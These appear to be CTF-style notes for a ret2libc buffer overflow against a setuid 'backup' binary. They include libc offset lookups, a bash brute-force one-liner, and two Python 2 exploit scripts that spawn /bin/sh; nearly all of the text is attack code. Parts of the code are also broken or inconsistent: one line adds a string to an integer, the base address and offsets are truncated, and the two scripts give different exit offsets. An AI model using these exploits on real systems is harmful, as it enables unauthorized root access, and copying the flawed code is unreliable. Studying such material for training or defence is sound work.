Check for a buffer overflow vulnerability; first find which libc the binary is linked against:
ldd /usr/bin/filename | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf75df000)
Get the offset of `system` in libc:
readelf -s /lib32/libc.so.6 | grep system
245: 00110820 68 FUNC svcerr_systemerr@@GLIBC_2.0
627: 0003a940 55 FUNC _libc_system@@GLIBC_PRIVATE
1457: 0003a940 55 FUNC system@@GLIBC_2.0
We need the value of `system@@GLIBC_2.0`: "0003a940".
Get the offset of `exit` in libc:
readelf -s /lib32/libc.so.6 | grep exit
2263: 0002e7d0 78 FUNC on_exit@@GLIBC_2.0
Get the offset of the `/bin/sh` string in libc:
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
15900b /bin/sh
# Unbounded retry loop for the shell one-liner form of the payload: 512 filler
# bytes followed by three packed 32-bit little-endian values. The python -c
# snippet uses Python 2 print/str syntax. The loop runs until interrupted and
# re-executes the target every iteration, so a run of it is highly visible on
# the host (a steady stream of process starts/crashes from the same binary).
while true; do /usr/local/bin/backup -i $(python -c 'print "A" * 512 + "\x40\xa9\x03\x00\xb0\xe7\x02\x00\x0b\x90\x15\x00"'); done
IppSec buffer overflow exploit code:
from subprocess import call
import struct
# libc load address taken from the target (ldd output above); the symbol
# offsets below are added to it to form absolute addresses.
libc_base_addr = 0xf75b000
system_off=0x0003a940 # offset of system (readelf output above)
exit_off=0x0002e7d0 # exit offset (readelf output above)
arg_off=0x00015900 # shell-string offset (strings output above)
# Each address is packed as a 4-byte little-endian value ("<I").
system_addr = struct.pack("<I", libc_base_addr+system_off)
exit_addr= struct.pack("<I",libc_base_addr+exit_off)
arg_addr = struct.pack("<I",libc_base_addr+arg_off)
# Payload: filler, then the three packed addresses in the order
# system, exit, argument.
buf = "A" +512
buf += system_addr
buf += exit_addr
buf += arg_addr
i = 0
# Fixed-count retry loop (Python 2 print statement). The page lost the
# original indentation; the call is placed inside the loop here because a
# retry loop that never re-runs the target would serve no purpose.
# NOTE(review): hard-coded addresses only hold if libc maps at the same base
# on every run; randomised library placement invalidates all three.
while (i < 512):
    print "Try %s" %i
    i +=1
    ret = call(["/usr/local/bin/backup", buf])
Exploit:
import struct
from subprocess import call
# libc load address observed on the target (ldd output above); the two symbol
# offsets come from `readelf -s` and are added to it below.
libc_base_addr = 0xf7542000
system_off = 0x0003a940
exit_off = 0x0002e7b0
# Absolute addresses = base + offset.
system_addr = libc_base_addr + system_off
exit_addr = libc_base_addr + exit_off
# Address of the "/bin/sh" string inside libc (offset from `strings -t x`
# above), passed as the single argument to system.
system_arg = libc_base_addr + 0x0015900b
# NOTE(review): a hard-coded base only holds if libc maps at the same address
# on every run; randomised library placement (ASLR) invalidates all three.
def conv(num):
    """Return *num* as a 4-byte little-endian unsigned int (struct format "<I").

    This is the in-memory byte order of a 32-bit address on x86, which is why
    each computed address is passed through it before being appended to the
    payload. Values outside 0..0xFFFFFFFF raise struct.error.
    """
    fmt = "<I"
    packed = struct.pack(fmt, num)
    return packed
# Payload layout: 512 bytes of filler, then the three packed addresses in the
# order system, exit, argument. NOTE(review): the classic ret2libc frame —
# overwritten return address, then system's own return address, then its
# argument — inferred from the variable names, not shown by any line here.
buf = "A" * 512
buf += conv(system_addr)
buf += conv(exit_addr)
buf += conv(system_arg)
print "Calling vulnerable program"  # Python 2 print statement
i = 0
# Bounded retry loop. `call` returns the process exit status, so `not ret`
# means the target exited with 0 and the loop stops. The page lost the
# original indentation: the `else` is paired with the `if` here, but it could
# equally have been a `while ... else:` that prints once after all 255 tries.
# Each failed attempt presumably crashes the target, so a run of this script
# shows up to defenders as a burst of failures from the same binary.
while (i < 255):
    print "Number of tries: %d" %i
    i += 1
    ret = call(["/usr/local/bin/backup", "-i", "3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110", buf])
    if (not ret):
        break
    else:
        print "Exploit failed"